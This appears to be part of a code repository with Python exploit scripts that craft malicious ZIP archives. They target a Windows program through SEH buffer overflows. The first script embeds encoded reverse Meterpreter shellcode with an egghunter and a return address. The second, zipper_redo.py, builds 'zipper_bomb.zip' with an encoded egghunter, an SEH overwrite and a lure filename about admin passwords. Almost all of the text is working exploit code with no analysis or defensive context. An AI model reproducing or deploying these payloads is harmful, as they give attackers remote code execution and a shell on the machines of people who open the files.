 85 | rev_met_7887 += "\x4a\x30\x68\x4e\x4c\x66\x70\x6b\x70\x48\x6b"
 86 | rev_met_7887 += "\x62\x48\x63\x32\x43\x30\x37\x6e\x48\x4f\x4d"
 87 | rev_met_7887 += "\x59\x6b\x56\x52\x70\x32\x70\x70\x50\x36\x30"
 88 | rev_met_7887 += "\x61\x50\x42\x70\x73\x70\x56\x30\x35\x38\x4b"
 89 | rev_met_7887 += "\x5a\x74\x4f\x79\x4f\x59\x70\x39\x6f\x4a\x75"
 90 | rev_met_7887 += "\x6a\x37\x42\x4a\x62\x30\x70\x56\x56\x37\x52"
 91 | rev_met_7887 += "\x48\x6f\x69\x4d\x75\x63\x44\x45\x31\x39\x6f"
 92 | rev_met_7887 += "\x49\x45\x6f\x75\x6b\x70\x70\x74\x76\x6a\x69"
 93 | rev_met_7887 += "\x6f\x50\x4e\x34\x48\x52\x55\x68\x6c\x48\x68"
 94 | rev_met_7887 += "\x32\x47\x35\x50\x75\x50\x73\x30\x63\x5a\x57"
 95 | rev_met_7887 += "\x70\x61\x7a\x64\x44\x56\x36\x61\x47\x43\x58"
 96 | rev_met_7887 += "\x53\x32\x6b\x69\x5a\x68\x31\x4f\x69\x6f\x4a"
 97 | rev_met_7887 += "\x75\x6c\x43\x6a\x58\x63\x30\x63\x4e\x47\x46"
 98 | rev_met_7887 += "\x6c\x4b\x66\x56\x71\x7a\x33\x70\x55\x38\x45"
 99 | rev_met_7887 += "\x50\x62\x30\x75\x50\x63\x30\x76\x36\x30\x6a"
100 | rev_met_7887 += "\x35\x50\x51\x78\x52\x78\x6c\x64\x43\x63\x48"
101 | rev_met_7887 += "\x65\x4b\x4f\x7a\x75\x4f\x63\x63\x63\x50\x6a"
102 | rev_met_7887 += "\x37\x70\x66\x36\x63\x63\x32\x77\x45\x38\x34"
103 | rev_met_7887 += "\x42\x58\x59\x68\x48\x63\x6f\x39\x6f\x68\x55"
104 | rev_met_7887 += "\x6e\x63\x7a\x58\x53\x30\x43\x4d\x54\x68\x43"
105 | rev_met_7887 += "\x68\x30\x68\x37\x70\x31\x50\x47\x70\x53\x30"
106 | rev_met_7887 += "\x61\x7a\x37\x70\x46\x30\x43\x58\x54\x4b\x74"
107 | rev_met_7887 += "\x6f\x76\x6f\x66\x50\x49\x6f\x48\x55\x62\x77"
108 | rev_met_7887 += "\x61\x78\x44\x35\x70\x6e\x52\x6d\x61\x71\x39"
109 | rev_met_7887 += "\x6f\x48\x55\x31\x4e\x61\x4e\x49\x6f\x46\x6c"
110 | rev_met_7887 += "\x47\x54\x44\x4f\x6b\x35\x32\x50\x79\x6f\x4b"
111 | rev_met_7887 += "\x4f\x39\x6f\x6d\x39\x6d\x4b\x79\x6f\x6b\x4f"
112 | rev_met_7887 += "\x4b\x4f\x46\x61\x38\x43\x47\x59\x59\x56\x61"
113 | rev_met_7887 += "\x65\x5a\x61\x4a\x63\x6d\x6b\x5a\x50\x48\x35"
114 | rev_met_7887 += "\x4f\x52\x62\x76\x30\x6a\x47\x70\x30\x53\x79"
115 | rev_met_7887 += "\x6f\x4b\x65\x41\x41"
116 | 
117 | payload  = "Z" * 102
118 | payload += encoded_egghunter
119 | payload += "Z" * (as_offset - len(payload))
120 | print "Size of payload: " + str(len(payload))
121 | payload += "BBBB"
122 | payload += encoded_edi
123 | payload += "B" * (119-len(encoded_edi))
124 | print "Size of payload: " + str(len(payload))
125 | payload += "\x71\x9F\x70\x9F"
126 | payload += pack("<L", 0x00451845)
127 | payload += rev_met_7887
128 | payload += "D" * (max_size - len(payload) - len(payload_ext))
129 | 
130 | payload = payload + payload_ext
131 | payload_len = len(payload)
132 | 
133 | print("[*] Size : {length} bytes".format(length=payload_len))
134 | print("[*] Removing old {filename} file".format(filename=filename))
135 | try:
136 |     remove(filename)
137 | except OSError:
138 |     print("[!] Couldn't remove, probably doesn't exist. Ignoring this error")
139 |     pass
140 | print("[*] Creating new {filename} file".format(filename=filename))
141 | with open(filename, "w") as f:
142 |     file_content = ldf_header + payload + cdf_header + payload + eofcdf_header
143 |     f.write(file_content)
144 | 
145 | #original:  7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90
146 | #mangled:   7E 7F C7 FC E9 E2 E4 E0 E5 E7 EA EB E8 EF EE EC C4 C5 C9  
147 | 
148 | #original:  91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0
149 | #mangled:   E6 C6 F4 F6 F2 FB F9 FF D6 DC A2 A3 A5 50 83 E1   
150 | 
151 | #original:  a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0
152 | #mangled: ED F3 FA F1 D1 AA BA BF AC AC BD BC A1 AB BB A6 A6 A6 A6 A6 A6 A6 2B 2B A6 A6 2B 2B 2B 2B 2B 2B     
153 | 
154 | #original:  c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0
155 | #mangled:  2D 2D 2B 2D 2B A6 A6 2B 2B 2D 2D A6 2D 2B 2D 2D 2D 2D 2B 2B 2B 2B 2B 2B 2B 2B A6 5F A6 A6 AF 61          
156 | 


--------------------------------------------------------------------------------
/zipper_redo.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from os import remove
 4 | from struct import pack
 5 | 
 6 | evil_filename = "zipper_bomb.zip"
 7 | payload_ext = ".txt"
 8 | max_size = 4064
 9 | nseh_offset = 1022
10 | 
11 | ldf_header = (
12 |     "\x50\x4B\x03\x04\x14\x00\x00"
13 |     "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
14 |     "\x00\x00\x00\x00\x00\x00\x00\x00"
15 |     "\xe4\x0f"  # file size
16 |     "\x00\x00\x00"
17 | )
18 | 
19 | cdf_header = (
20 |     "\x50\x4B\x01\x02\x14\x00\x14"
21 |     "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
22 |     "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
23 |     "\xe4\x0f"  # file size
24 |     "\x00\x00\x00\x00\x00\x00\x01\x00"
25 |     "\x24\x00\x00\x00\x00\x00\x00\x00"
26 | )
27 | 
28 | eofcdf_header = (
29 |     "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
30 |     "\x12\x10\x00\x00"  # Size of central directory (bytes)
31 |     "\x02\x10\x00\x00"  # Offset of start of central directory,
32 |     # relative to start of archive
33 |     "\x00\x00"
34 | )
35 | 
36 | #root@kali:~# msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows 
37 | encoded_egghunter = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVNazjYoTOqRf2SZS2Chjm6NGLgubz0tholx3GfPDpbTNkkJnOsEZJloQeJGIoHgAA"
38 | filename =  "Admin accounts and passwords.txt" + " " * 100
39 | junk  = encoded_egghunter  
40 | junk += "A" * (nseh_offset - len(filename + encoded_egghunter))
41 | nseh = "BBBB"
42 | seh = pack("<L",0x00433b3b)
43 | payload = filename + junk + nseh + seh
44 | 
45 | 
46 | rest = "D" * (max_size - len(payload))
47 | payload = payload + rest + payload_ext
48 | payload_len = len(payload)
49 | 
50 | print("[*] Size : {length} bytes".format(length=payload_len))
51 | print("[*] Removing old {filename} file".format(filename=evil_filename))
52 | try:
53 |     remove(evil_filename)
54 | except OSError:
55 |     print("[!] Couldn't remove, probably doesn't exist. Ignoring this error")
56 |     pass
57 | print("[*] Creating new {filename} file".format(filename=evil_filename))
58 | with open(evil_filename, "w") as f:
59 |     file_content = ldf_header + payload + cdf_header + payload + eofcdf_header
60 |     f.write(file_content)
61 | 
62 | 


--------------------------------------------------------------------------------